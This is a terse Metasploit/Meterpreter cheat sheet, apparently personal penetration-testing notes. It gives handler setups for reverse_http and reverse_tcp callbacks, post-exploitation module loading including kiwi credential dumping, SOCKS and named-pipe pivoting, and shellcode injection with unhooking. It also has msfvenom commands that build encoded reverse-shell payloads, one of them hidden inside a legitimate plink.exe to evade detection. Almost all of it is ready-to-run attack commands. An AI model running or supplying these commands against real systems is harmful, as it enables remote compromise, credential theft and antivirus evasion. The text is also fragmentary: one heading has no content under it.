Meterpreter

Start

create launch file, file.rb:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST $ip
set LPORT 443
set exitfunc thread
set EnableStageEncoding True
set ExitOnSession false
exploit -j

launch msf:

meterpreter -r script.rb

Catch:

get session and load all:

load bofloader 
load espia 
load extapi
load incognito 
load kiwi
load lanattacks
load peinjector
load powershell
load priv
load python
load sniffer 
load stdapi
load unhook
load winpmem 

Proxy:

session -C 'run autoroute -s 10.10.10.0/24'
search socks 
use 0 
exploit

Inject Binary into memory:

use post/windows/manage/shellcode_inject
set autounhook true
set session X 
set shellcode /root/shell.bin
set wait_unhook 20

Pivot:

first create the named pipe pivot:

sessions -i -1
pivot add -t pipe -l <SESSION_HOST> -n msf-pipe -a x64 -p windows

Create and send a payload to the handler

use payload/windows/x64/meterpreter/reverse_tcp
set lport <PORT>
set lhost <YOUR_HOST>
to_handler

create smb payload

msfvenom -p windows/x64/meterpreter/reverse_named_pipe lhost=<SESSION_HOST> PIPENAME=msf-pipe --encrypt xor --encrypt-key z -f csharp

execute

meterpreter

msfconsole

XXX/shell_reverse_tcp – Not Stages

XXX/shell/reverse_tcp - Staged

Multi/handler

show adv
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
exploit -j
set AutoRunScript windows/gather/enum_logged_on_users
jobs -i 1

switch transports:

transport list
transport add -t reverse_tcp -l 192.168.118.2 -p 5555
transport next

Pivot :

route add 192.168.1.0/24 11

msfdb

Service postgresql start
Msfdb init
Workspace -a NEW
Workspace NEW
Db_nmap -sS -sV -Pn -n 10.11.1.0/24
Services
services -p 445 --rhosts
Hosts -S windows -R (add to current module – can also be filtered)
creds
loot

msfvenom

Powershell One-Liner:

Imbed Exe:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe